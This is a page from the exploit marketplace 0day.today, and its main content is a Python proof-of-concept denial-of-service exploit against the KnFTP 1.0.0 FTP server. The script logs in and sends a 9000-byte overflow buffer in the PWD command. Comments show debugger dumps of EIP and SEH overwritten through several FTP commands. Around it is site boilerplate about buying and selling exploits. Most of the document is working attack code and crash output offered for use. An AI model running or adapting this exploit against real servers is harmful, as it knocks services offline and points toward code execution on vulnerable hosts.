0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)
#!/usr/bin/python # Title: KnFTP Server Buffer Overflow Exploit (DoS PoC) # From: The eh?-Team || The Great White Fuzz (we're not sure yet) # Found by: loneferret (kinda) # Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/ # Date Found: Sept 18th 2011 # Tested on: Windows XP SP2/SP3 Professional (DEP off) # Nod to the Exploit-DB Team # Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD # So it just looks like all this app's commands are vulnerable. Even commands # that the server doesn't support. SEH and/or EIP gets overwriten. # It's almost like this application was made to be vulnerable. # Anyway have fun. #EAX 7EFEFEFE #ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDX 41414141 #EBX 00C7FE92 ASCII "MKD" #ESP 00C7CD94 #EBP 00C7CDC4 #ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDI 00C7FFFE #EIP 77C460C1 msvcrt.77C460C1 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 1 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDE000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty 0.00000000000000000000 #ST1 empty 0.00000000000000000000 #ST2 empty 2.1219957909652723000e-314 #ST3 empty 0.00000000000000000000 #ST4 empty 0.00000000000000000000 #ST5 empty 0.00000000000000000000 #ST6 empty 0.00000000000000000000 #ST7 empty 1.2519775166695107000e-312 # 3 2 1 0 E S P U O Z D I #FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) #FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 #EAX 7EFEFEFE #ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDX 41414141 #EBX 00C7FE92 ASCII "LS" #ESP 00C7CD94 #EBP 00C7CDC4 #ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDI 00C7FFFF #EIP 77C460C1 msvcrt.77C460C1 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 1 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDE000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty 0.00000000000000000000 #ST1 empty 0.00000000000000000000 #ST2 empty 2.1219957909652723000e-314 #ST3 empty 0.00000000000000000000 #ST4 empty 0.00000000000000000000 #ST5 empty 0.00000000000000000000 #ST6 empty 0.00000000000000000000 #ST7 empty 1.2519775166695107000e-312 # 3 2 1 0 E S P U O Z D I #FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) #FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 #SEH chain of thread 000001BC, item 0 #Address=00C7FFDC #SE handler=41414141 #EAX 7EFEFEFE #ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA... #EDX 41414141 #EBX 00C7FE92 ASCII "ABOR" #ESP 00C7CD94 #EBP 00C7CDC4 #ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA... #EDI 00C7FFFD #EIP 77C460C1 msvcrt.77C460C1 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 1 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDD000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty 0.00000000000000000000 #ST1 empty 0.00000000000000000000 #ST2 empty 2.1219957909652723000e-314 #ST3 empty 0.00000000000000000000 #ST4 empty 0.00000000000000000000 #ST5 empty 0.00000000000000000000 #ST6 empty 0.00000000000000000000 #ST7 empty 1.2519775166695107000e-312 # 3 2 1 0 E S P U O Z D I #FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) #FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 import socket buffer = "\x41" * 9000 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xxx.xxx.xxx.xxx',21)) s.recv(1024) s.send('USER test\r\n') s.recv(1024) s.send('PASS test\r\n') s.recv(1024) s.send('PWD ' + buffer + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close # 0day.today [2024-10-06] #